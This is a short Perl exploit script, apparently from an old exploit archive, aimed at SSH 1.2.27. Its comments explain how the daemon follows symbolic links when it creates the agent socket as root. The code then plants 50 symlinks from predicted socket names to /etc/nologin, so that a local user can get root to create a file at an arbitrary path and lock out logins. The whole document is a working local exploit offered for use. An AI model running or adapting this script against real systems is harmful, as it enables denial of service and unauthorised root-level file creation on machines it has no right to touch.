#!/usr/bin/perl
#
#     vulnerable: SSH 1.2.27
#
# A vulnerability in SSH's creation of the authentication
# agent UNIX domain socket allows local users to create a
# UNIX  domain socket with  an arbitrary file name in the
# system.
#
# SSH has  the concept of authentication proxying via the
# SSH authentication agent. It allows for a basic kind of
# Single Sign-On capability. The sshd daemon, ssh and ssh
# -agent communicate via a UNIX domain socket normally of
# the  form  '/tmp/ssh-<username>/agent-socket-<pid>'.
#
# SSH follows symbolic links while creating the socket as
# root thus  allowing any local  users with ssh access to
# create  a  socket  with  an  arbitrary  filename in the
# system.
#
# Notice  that  this  will  not  work under all operating
# systems. Some operating systems  do not follow symbolic
# links during bind on UNIX domain  sockets. Linux 2.0.x,
# Solaris 2.5.1  and  IRIX 6.5.2  do  not follow symbolic
# links during bind(2). Linux 2.1.x does.

$pid = $$;

$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);

for ($i = $pid; $i < $pid+50; $i++)
{
  symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}

#                    www.hack.co.za           [23 May 2000]#